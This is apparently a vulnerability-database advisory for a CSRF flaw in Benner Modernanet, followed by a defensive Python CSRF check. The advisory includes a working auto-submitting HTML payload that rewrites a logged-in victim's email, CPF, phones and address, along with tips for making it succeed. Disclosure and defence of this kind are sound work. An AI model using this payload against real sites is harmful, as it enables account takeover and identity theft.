Submit #500575: benner modernanet < 1.2.1 Cross-Site Request Forgery

Title: benner modernanet < 1.2.1 Cross-Site Request Forgery
Description:

Cross-Site Request Forgery leads to Account Take Over on Modernanet (Benner)

Description: A Cross-Site Request Forgery (CSRF) vulnerability has been identified in the Modernanet system, developed by Benner. This vulnerability allows an attacker to manipulate sensitive user data, including personal details and contact information, for any authenticated user without their consent. By crafting a malicious page with a specially constructed payload, an attacker can alter personal data such as name, email, CPF, address, and more, for a victim who is currently logged in to the system.

Impact: An attacker can modify critical personal information of any logged-in user, which can lead to identity theft, unauthorized changes, and potential exploitation of the victim's account. The attack requires no interaction from the victim other than visiting the malicious page, which makes it a significant security risk.

Vulnerable Endpoint: https://*.modernanet.com.br/DadosPessoais/SG_Gravar
Method: GET
Vulnerable Parameters: Various personal data fields (e.g., DADOS_PESSOAIS_USER_NAME, DADOS_PESSOAIS_CPF, etc.)
Proof of Concept (PoC):

<!DOCTYPE html>
<html>
<head>
  <title>PoC CSRF</title>
</head>
<body onload="document.getElementById('csrfForm').submit()">
  <form id="csrfForm" method="GET" action="https://*.modernanet.com.br/DadosPessoais/SG_Gravar">
    <input type="hidden" name="idItAg" value="">
    <input type="hidden" name="idItAgPagto" value="">
    <input type="hidden" name="DADOS_PESSOAIS_USER_NAME" value="email@GMAIL.COM">
    <input type="hidden" name="DADOS_PESSOAIS_USER_PASSWORD" value="">
    <input type="hidden" name="DADOS_PESSOAIS_USER_PASSWORD_RETYPE" value="">
    <input type="hidden" name="DADOS_PESSOAIS_IDPESFIS" value="119642">
    <input type="hidden" name="DADOS_PESSOAIS_IDPESPLA" value="204354">
    <input type="hidden" name="DADOS_PESSOAIS_CPF" value="47455178824">
    <input type="hidden" name="DADOS_PESSOAIS_DATANASC_DATE" value="10/10/2000">
    <input type="hidden" name="DADOS_PESSOAIS_DATANASC_TIME" value="">
    <input type="hidden" name="DADOS_PESSOAIS_NOME" value="TEST">
    <input type="hidden" name="DADOS_PESSOAIS_SEXO" value="F">
    <input type="hidden" name="DADOS_PESSOAIS_EMPRESA" value="TEST">
    <input type="hidden" name="DADOS_PESSOAIS_RG" value="111111111111">
    <input type="hidden" name="DADOS_PESSOAIS_CONVENIO" value="11">
    <input type="hidden" name="DADOS_PESSOAIS_PLANO" value="5">
    <input type="hidden" name="DADOS_PESSOAIS_CODIGO_CONVENIO" value="">
    <input type="hidden" name="DADOS_PESSOAIS_PAI" value="">
    <input type="hidden" name="DADOS_PESSOAIS_MAE" value="TEST">
    <input type="hidden" name="DADOS_PESSOAIS_ENDER_ID" value="0">
    <input type="hidden" name="DADOS_PESSOAIS_TIPOEND" value="1">
    <input type="hidden" name="txtDADOS_PESSOAIS_CEP" value="A VALID ZIP CODE">
    <input type="hidden" name="txtDADOS_PESSOAIS_CIDADE" value="CITY">
    <input type="hidden" name="txtDADOS_PESSOAIS_BAIRRO" value="neighborhood">
    <input type="hidden" name="DADOS_PESSOAIS_LOGRADOURO" value="STREET">
    <input type="hidden" name="DADOS_PESSOAIS_NUMERO" value="">
    <input type="hidden" name="DADOS_PESSOAIS_COMPLEMENTO" value="">
    <input type="hidden" name="DADOS_PESSOAIS_QTDE_TELEFONES" value="2">
    <input type="hidden" name="DADOS_PESSOAIS_FONE_ID_0" value="138552">
    <input type="hidden" name="DADOS_PESSOAIS_TIPOFONE_0" value="3">
    <input type="hidden" name="DADOS_PESSOAIS_PREFIXO_0" value="12">
    <input type="hidden" name="DADOS_PESSOAIS_NUMFONE_0" value="12313-1231">
    <input type="hidden" name="DADOS_PESSOAIS_FONE_ID_1" value="138551">
    <input type="hidden" name="DADOS_PESSOAIS_TIPOFONE_1" value="1">
    <input type="hidden" name="DADOS_PESSOAIS_PREFIXO_1" value="18">
    <input type="hidden" name="DADOS_PESSOAIS_NUMFONE_1" value="1081-8923">
    <input type="hidden" name="DADOS_PESSOAIS_INT_ID" value="33675">
    <input type="hidden" name="DADOS_PESSOAIS_INT_ENDERECO" value="email@GMAIL.COM">
    <input type="hidden" name="DADOS_PESSOAIS_INT_PERM" value="S">
    <input type="hidden" name="DADOS_PESSOAIS_INT_PREFER" value="[object Object]">
  </form>
</body>
</html>

**** It is important to ensure that the input values in the payload meet the specific requirements, such as the correct format for Brazilian CPF, dates, ZIP codes, and other sensitive fields. Otherwise, the payload may not work correctly, as these data need to be formatted according to the server's expectations for the request to be processed successfully. ****

By visiting the malicious page, the victim's sensitive information will be updated as defined in the hidden input fields. This can include personal details such as email, CPF, and contact information.

By: Yago Martins
Source: https://github.com/yago3008/cves
User: y4g0 (UID 80480)
Submission: 02/13/2025 05:51 PM (4 months ago)
Moderation: 02/24/2025 06:22 PM (11 days later)
Status: Accepted
VulDB Entry: 296694 [Benner ModernaNet up to 1.2.0 /DadosPessoais/SG_Gravar idItAg cross-site request forgery]
Points: 20
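
Added example (not part of the submission and not Benner's code): a server-side check that a state-changing route such as /DadosPessoais/SG_Gravar could apply before saving profile data, run against constructed requests shaped like the one reported above. The host name, header dictionaries, function names and token handling are assumptions made for illustration.

```python
import hmac
import secrets
from urllib.parse import urlsplit

SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}   # must never change server state
ALLOWED_HOST = "portal.example.test"        # placeholder host (assumption)


def check_state_change(method, headers, session_token, submitted_token):
    """Decide whether a request to a state-changing route may proceed.

    Returns (allowed, reason). `headers` is a plain dict keyed by the
    canonical header names used below.
    """
    # 1. The reported endpoint saved profile data on GET; refuse safe methods.
    if method.upper() in SAFE_METHODS:
        return False, "state change over safe method"
    # 2. Fetch Metadata: browsers that send it label cross-site requests.
    site = headers.get("Sec-Fetch-Site")
    if site is not None and site != "same-origin":
        return False, "cross-site fetch metadata"
    # 3. Origin (or Referer as fallback) must name our own host.
    source = headers.get("Origin") or headers.get("Referer")
    if source and urlsplit(source).hostname != ALLOWED_HOST:
        return False, "origin mismatch"
    # 4. Per-session token, compared in constant time.
    if not session_token or not submitted_token:
        return False, "missing CSRF token"
    if not hmac.compare_digest(session_token.encode(), submitted_token.encode()):
        return False, "invalid CSRF token"
    return True, "ok"


def evaluate_samples():
    """Run constructed requests for /DadosPessoais/SG_Gravar through the check."""
    token = secrets.token_urlsafe(32)        # issued with the user's session
    cross = {"Origin": "https://other.example.test", "Sec-Fetch-Site": "cross-site"}
    own = {"Origin": "https://" + ALLOWED_HOST, "Sec-Fetch-Site": "same-origin"}
    return {
        # Shape of the reported request: GET, no token, sent from another site.
        "forged_get": check_state_change("GET", cross, token, None),
        # The same forgery switched to POST: still cross-site, still no token.
        "forged_post": check_state_change("POST", cross, token, None),
        # Client sending neither Origin nor Fetch Metadata: the token decides.
        "no_headers_no_token": check_state_change("POST", {}, token, None),
        # Form rendered by the application itself, carrying the session token.
        "legitimate": check_state_change("POST", own, token, token),
    }


if __name__ == "__main__":
    for name, verdict in evaluate_samples().items():
        print(name, verdict)
```

The order of the checks matters for logging: the first failing control is the reason recorded, so a forged GET is reported as a method violation even though it also lacks a token.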
